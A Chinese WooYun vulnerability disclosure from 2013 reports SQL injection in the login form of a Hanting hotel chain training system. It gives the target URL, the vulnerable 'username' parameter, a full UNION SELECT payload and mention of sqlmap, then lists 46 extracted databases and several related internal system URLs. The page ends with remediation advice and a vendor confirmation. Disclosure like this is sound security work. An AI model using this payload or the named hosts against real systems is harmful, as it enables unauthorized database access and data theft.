当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020735

漏洞标题:汉庭某系统注射注射出几个系统

相关厂商:汉庭酒店

漏洞作者: 小胖子

提交时间:2013-03-27 02:45

修复时间:2013-05-11 02:45

公开时间:2013-05-11 02:45

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-27: 细节已通知厂商并且等待厂商处理中
2013-03-27: 厂商已经确认,细节仅向厂商公开
2013-04-06: 细节向核心白帽子及相关领域专家公开
2013-04-16: 细节向普通白帽子公开
2013-04-26: 细节向实习白帽子公开
2013-05-11: 细节向公众公开

简要描述:

听说汉庭有免房卡?

详细说明:

这下可牵扯出大的了。
千里之堤毁于注入,注入地点:
http://training.htinns.com/exam2/ 汉庭考试系统?员工还考试的?
很明显的是有些系统也被波及了,比如上一级目录就是OA系统!
http://training.htinns.com/
注入点,登录框注射,参数,username。
随手输入'or'登录,就报错,还不是小报错。

sql.jpg


然后呢
Payload: username=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(58)+CHAR(110)+CHAR(104)
+CHAR(120)+CHAR(58)+CHAR(119)+CHAR(75)+CHAR(100)+CHAR(90)+CHAR(89)+CHAR(66)+CHAR
(103)+CHAR(110)+CHAR(79)+CHAR(120)+CHAR(58)+CHAR(110)+CHAR(98)+CHAR(117)+CHAR(58
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=1&czbz=1
在然后呢?丢到sqlmap去看看。

SQLINJECT.jpg


跑出数据库一看,不看不知道,一看吓一跳。

available databases [46]:
[*] Application_Registry_Service_DB
[*] Bdc_Service_DB
[*] dbcenter
[*] Decision
[*] eCell6
[*] Exam1
[*] HTFranchisee
[*] HtinnsAdviser
[*] HTScore
[*] InnInspection
[*] InspectionAudit
[*] Managed Metadata Service
[*] master
[*] model
[*] msdb
[*] OA
[*] PerformancePoint Service Application
[*] PnCheck
[*] PurchaseSurvey
[*] RCTIDB
[*] ReportServer
[*] ReportServerTempDB
[*] ROOMCHK
[*] Search_Service_Application_CrawlStoreDB
[*] Search_Service_Application_DB
[*] Search_Service_Application_PropertyStoreDB
[*] Secure_Store_Service_DB
[*] SharePoint_AdminContent
[*] SharePoint_Config
[*] slam
[*] StateService
[*] tempdb
[*] test
[*] User Profile Service Application_ProfileDB
[*] User Profile Service Application_SocialDB
[*] User Profile Service Application_SyncDB
[*] USERPLUS
[*] VHArchives_HanTing
[*] WebAnalyticsService_ReportingDB
[*] WebAnalyticsService_StagingDB
[*] WordAutomationServices
[*] WSS_Content
[*] WSS_Content_90
[*] WSS_Content
[*] WSS_Logging
[*] YunYing


46个数据库,仔细一看,还有另外几个大系统的库。
比如:
OA系统:http://training.htinns.com/
网上报销系统:http://hters.htinns.com
运营系统:http://yunying.htinns.com/ 数据库YunYing,可惜只能盲注,好慢好慢。
投资决策系统:http://jcxt.htinns.com/
都是重要系统,本屌丝不敢乱来,赶紧报送,望速修复。

漏洞证明:

见详细说明。

修复方案:

1:注入没什么好说的,过滤过滤再过滤。
2:数据库账户降权。
3:礼物和rank是不是要给力一点?乌云自有颜如玉,也要汉庭大床房!

版权声明:转载请注明来源 小胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-03-27 13:25

厂商回复:

感谢漏洞提交,已转交相关小组进行跟进,该漏洞其他同学已提交过,不过还是给个15分。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-03-27 08:37 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    好像有看见过那传说中的卡

  2. 2013-03-27 08:51 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @wefgod @小胖子 等你确认有了再说...

  3. 2013-03-27 09:36 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:165 | 没有最专业的农民,只有更努力地耕耘..........)

    @leaf 我咋没有呢,哈。

  4. 2013-03-27 09:41 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @专业种田 洞主现身说法,那看来真没有...

  5. 2013-03-27 09:58 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @专业种田 @leaf @wefgod 貌似看到zone有人分享还是微博上有人分享,汉庭的免房卡。

  6. 2013-03-27 10:04 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:165 | 没有最专业的农民,只有更努力地耕耘..........)

    @小胖子 在微博上看到的吧。

  7. 2013-03-30 15:38 | ( 路人 | Rank:17 漏洞数:4 | 想...想活捉一枚处男...ing...)

    太贱了 。。。。房卡都不放过

  8. 2013-07-05 00:37 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:165 | 没有最专业的农民,只有更努力地耕耘..........)

    @汉庭酒店 这个还没有修复